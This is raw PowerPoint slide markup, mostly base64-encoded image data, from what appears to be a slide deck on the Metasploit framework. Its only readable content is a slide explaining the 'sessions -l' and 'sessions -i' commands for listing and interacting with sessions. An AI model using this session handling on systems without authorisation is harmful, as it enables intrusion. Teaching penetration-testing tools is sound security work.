wiovbW7MGLW00YYjgw0dfwuNfdwqVorU6MavZk23PRXNHdsMwlX2Gskg9/qt8PCqVjMLJC2WVGRvZdSp91+NfR1N8XgI5VyyIrr7LqGHkatHma2QlwJ6PnPpKOkrZNo+i3By6qrwn/wBt9P8Ape48rVW8b6GnH6LEqe6SMr/EpPyqy5Ysg+GaM/6SjpKtOI9FWOXgsT/hlt/OFpm/o52gP/LE+EsR/rpu8fsn0n9EF0lHSVOr6OtoH/yxHjLEP66dQei3HtxSNPxTL/Rmo7x+w6S+isdJR0lX3B+huU/pcTGvciM582y1YtneifCR2MnSTH9t8q/9KW+JNK+WKHXDNmRwRs7BUVmY8FVSzHwA1q4bE9GOJmsZrQJ2HrSHwQGw95HhWrYDZMUC5YY0jXsRQt/G3H306AqMuZvReP46WyD2Dufh8ILxpd+cj9aQ+B4KO4WqcAr2iott7OhJLQUUUVhoUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQB5XtFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAf/Z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7017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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MEtasploit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7975" y="1143000"/>
            <a:ext cx="8181974" cy="5029200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Sessions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sessions -l lists all active sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sessions –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;id&gt; interact with a given session</a:t>
            </a:r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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,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